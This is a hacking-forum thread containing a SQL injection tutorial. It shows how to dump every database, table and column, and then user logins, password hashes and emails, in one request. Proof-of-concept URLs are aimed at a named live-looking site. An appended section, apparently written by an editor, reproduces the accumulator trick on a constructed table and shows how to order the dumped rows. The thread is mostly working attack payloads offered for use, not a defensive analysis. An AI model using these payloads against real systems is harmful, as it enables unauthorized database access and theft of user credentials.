Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
TUTORIAL : [All DB In [1] Request]
Posted by: blackrose
Date: May 31, 2012 04:00PM

greetz to ๖ۣۜDan & DenJacker

What we will be doing is using nested select statements (subqueries), along with our own variable, to bypass the 1024-character limit of group_concat. If you're new to SQL, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests.


First off, the database/table/columns.

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)

PoC:

http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+




Of course, if magic_quotes is enabled, you would need to avoid quotation marks by using hex values or the char() function.

View the source, and we see every single database/table/column accessible.






Now, to grab information from the columns.


(select (@) from (select (@:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns))))x)


PoC:

http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+



Thanks for viewing this tutorial. If you need help, post below. If you have anything you want added, post below or pm me. Thanks

Re: TUTORIAL : [All DB In [1] Request]
Posted by: Freesia
Date: July 06, 2014 07:25AM

Thank you blackrose, very nice trick!
My question is: how can I order the results, for example in your demo, order by ID?

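As a worked example added by the editor (this is not code from blackrose or Freesia), the following MySQL session reproduces the user-variable accumulator from the tutorial on a constructed test.pp_users table, shows the group_concat truncation it works around, and then addresses the ordering question from the reply by feeding the accumulator from an ordered derived table. The table layout, the rows and the REPEAT() padding are constructed for illustration; the empty-named user variable @ is the one the tutorial uses.

```sql
-- Added example, not from the original thread. Constructed sandbox:
-- a small test.pp_users table with rows deliberately inserted out of ID order.
CREATE DATABASE IF NOT EXISTS test;
USE test;
DROP TABLE IF EXISTS pp_users;
CREATE TABLE pp_users (
  ID         INT PRIMARY KEY,
  user_login VARCHAR(60),
  user_pass  VARCHAR(255),
  user_email VARCHAR(100)
);
INSERT INTO pp_users VALUES
  (3, 'carol', '$P$Bconstructed3', 'carol@example.com'),
  (1, 'admin', '$P$Bconstructed1', 'admin@example.com'),
  (2, 'bob',   '$P$Bconstructed2', 'bob@example.com');

-- 1. The limit being bypassed. GROUP_CONCAT silently truncates its result at
--    group_concat_max_len (1024 bytes on a stock server) and only raises a
--    warning, so a real dump of 1200 bytes comes back as 1024.
SELECT @@group_concat_max_len;                                -- 1024
SELECT LENGTH(GROUP_CONCAT(REPEAT('x', 400))) FROM pp_users;  -- 1024, truncated
SHOW WARNINGS;

-- 2. The tutorial's accumulator. The scalar subquery compares @ with its own
--    new, longer value, so the WHERE is never true and the subquery yields
--    NULL; the side effect is that @ has been appended to once per row. The
--    outer SELECT then reads the finished @. No 1024-byte cap applies.
SELECT LENGTH(@) FROM (
  SELECT (@:=0x00),
         (SELECT (@) FROM pp_users WHERE (@) IN (@:=CONCAT(@, REPEAT('x', 400))))
) a;                                                          -- 1201 (1 NUL byte + 3*400)

-- 3. Same accumulator dumping the columns, as in the tutorial's second PoC.
--    Rows come back in whatever order the scan visits them (here: 3, 1, 2).
SELECT (@) FROM (
  SELECT (@:=0x00),
         (SELECT (@) FROM pp_users
           WHERE (@) IN (@:=CONCAT(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email)))
) b;

-- 4. Ordering (the follow-up question). Scan an ordered derived table instead
--    of the base table, so rows are appended to @ in ID order. The LIMIT is
--    there to stop the 5.7+/8.0 optimizer from merging the derived table into
--    the outer query, which could otherwise discard its ORDER BY.
SELECT (@) FROM (
  SELECT (@:=0x00),
         (SELECT (@)
            FROM (SELECT * FROM pp_users ORDER BY ID LIMIT 18446744073709551615) s
           WHERE (@) IN (@:=CONCAT(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email)))
) c;
-- Expected: one cell beginning with a NUL byte followed by
-- "\n1:admin:$P$Bconstructed1:admin@example.com\n2:bob:...\n3:carol:..."
```

Two caveats a practitioner should keep in mind: MySQL documents the evaluation order of user-variable assignments inside expressions as undefined, and MySQL 8.0 deprecates assigning user variables in any statement other than SET (it still runs, with a warning), so the trick is reliable on 5.x and current 8.0 but not guaranteed by the documentation. In the injection context, the same query is dropped into the UNION column exactly as in the tutorial's PoC; the leading 0x00 shows up as a NUL byte at the start of the output, which is why it is visible in the page source rather than the rendered page.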